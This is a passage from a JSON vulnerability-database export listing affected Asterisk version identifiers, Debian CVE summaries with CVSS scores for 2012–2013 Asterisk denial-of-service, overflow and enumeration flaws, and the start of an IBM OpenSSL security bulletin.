"cpe:2.3:a:asterisk:open_source:1.8.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:business_edition:c.3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta3:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:1.8.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc2:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.1:*:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:10.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:1.8.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc5:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc1:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc3:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.14.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.6.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:business_edition:c.3.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.7.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:business_edition:c.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.0:rc2:*:*:*:*:*:*", 
"cpe:2.3:a:asterisk:open_source:10.6.0:rc1:*:*:*:*:*:*"]}], "debiancve": [{"lastseen": "2023-01-16T06:05:21", "description": "main/http.c in the HTTP server in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones does not properly restrict Content-Length values, which allows remote attackers to conduct stack-consumption attacks and cause a denial of service (daemon crash) via a crafted HTTP POST request. NOTE: this vulnerability exists because of an incorrect fix for CVE-2012-5976.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "debiancve", "title": "CVE-2013-2686", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2013-2686"], "modified": "2013-04-01T16:55:00", "id": "DEBIANCVE:CVE-2013-2686", "href": "https://security-tracker.debian.org/tracker/CVE-2013-2686", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x before 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and Asterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an invalid SDP that defines a media description before 
the connection description in a SIP request.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "debiancve", "title": "CVE-2013-5642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5642"], "modified": "2013-09-09T17:55:00", "id": "DEBIANCVE:CVE-2013-5642", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5642", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.17.x through 1.8.22.x, 1.8.23.x before 1.8.23.1, and 11.x before 11.5.1 and Certified Asterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2 allows remote attackers to cause a denial of service (NULL pointer dereference, segmentation fault, and daemon crash) via an ACK with SDP to a previously terminated channel. 
NOTE: some of these details are obtained from third party information.", "cvss3": {}, "published": "2013-09-09T17:55:00", "type": "debiancve", "title": "CVE-2013-5641", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641"], "modified": "2013-09-09T17:55:00", "id": "DEBIANCVE:CVE-2013-5641", "href": "https://security-tracker.debian.org/tracker/CVE-2013-5641", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones, when anonymous calls are enabled, allow remote attackers to cause a denial of service (resource consumption) by making anonymous calls from multiple sources and consequently adding many entries to the device state cache.", "cvss3": {}, "published": "2013-01-04T15:55:00", "type": "debiancve", "title": "CVE-2012-5977", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2012-5977"], "modified": "2013-01-04T15:55:00", "id": "DEBIANCVE:CVE-2012-5977", "href": "https://security-tracker.debian.org/tracker/CVE-2012-5977", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "Multiple stack consumption vulnerabilities in Asterisk Open Source 1.8.x before 1.8.19.1, 10.x before 10.11.1, and 11.x before 11.1.2; Certified Asterisk 1.8.11 before 1.8.11-cert10; and Asterisk Digiumphones 10.x-digiumphones before 10.11.1-digiumphones allow remote attackers to cause a denial of service (daemon crash) via TCP data using the (1) SIP, (2) HTTP, or (3) XMPP protocol.", "cvss3": {}, "published": "2013-01-04T11:52:00", "type": "debiancve", "title": "CVE-2012-5976", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976"], "modified": "2013-01-04T11:52:00", "id": "DEBIANCVE:CVE-2012-5976", "href": "https://security-tracker.debian.org/tracker/CVE-2012-5976", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message with an odd number of bytes, which triggers an infinite 
loop.", "cvss3": {}, "published": "2013-12-19T22:55:00", "type": "debiancve", "title": "CVE-2013-7100", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2013-12-19T22:55:00", "id": "DEBIANCVE:CVE-2013-7100", "href": "https://security-tracker.debian.org/tracker/CVE-2013-7100", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-16T06:05:21", "description": "Stack-based buffer overflow in res/res_format_attr_h264.c in Asterisk Open Source 11.x before 11.2.2 allows remote attackers to execute arbitrary code via a long sprop-parameter-sets H.264 media attribute in a SIP Session Description Protocol (SDP) header.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "debiancve", "title": "CVE-2013-2685", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2013-04-01T16:55:00", "id": "DEBIANCVE:CVE-2013-2685", "href": "https://security-tracker.debian.org/tracker/CVE-2013-2685", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2023-01-16T06:05:21", "description": "The SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; Asterisk Business Edition (BE) C.3.x before C.3.8.1; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones exhibits different behavior for invalid INVITE, SUBSCRIBE, and REGISTER transactions depending on whether the user account exists, which allows remote attackers to enumerate account names by (1) reading HTTP status codes, (2) reading additional text in a 403 (aka Forbidden) response, or (3) observing whether certain retransmissions occur.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "debiancve", "title": "CVE-2013-2264", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264"], "modified": "2013-04-01T16:55:00", "id": "DEBIANCVE:CVE-2013-2264", "href": "https://security-tracker.debian.org/tracker/CVE-2013-2264", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ibm": [{"lastseen": "2022-09-29T18:25:40", "description": "## Abstract\n\nThree security vulnerabilities exist in the version of OpenSSL shipped with IBM Initiate Master Data Service and IBM InfoSphere Master Data Management Standard Edition. 
See the individual descriptions for the details.\n\n## Content\n\n**VULNERABILITY DETAILS: ** \n \n**CVE ID: **[_CVE-2013-0166_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=%20CVE-2013-0166>) \n \n**DESCRIPTION: ** \nA flaw in the OpenSSL handling of OCSP response verification can be exploited in a denial of service attack. \n \n**CVSS:** \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/81904> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n**CVE ID: **[_CVE-2013-0169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=%20CVE-2013-0169>) \n \n**DESCRIPTION: ** \nA weakness in the handling of CBC ciphersuites in SSL, TLS and DTLS could lead to plaintext recovery by exploiting timing differences arising during MAC processing. \n \n**CVSS:** \nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/81902> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N) \n \n**CVE ID: **[_CVE-2012-2686_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=%20CVE-2012-2686>) \n \n**DESCRIPTION: ** \nA flaw in the OpenSSL handling of CBC ciphersuites in TLS 1.1 and TLS 1.2 on AES-NI supporting platforms can be exploited in a DoS attack. \n \n**CVSS:** \nCVSS Base Score: 5 \nCVSS Temporal Score: See 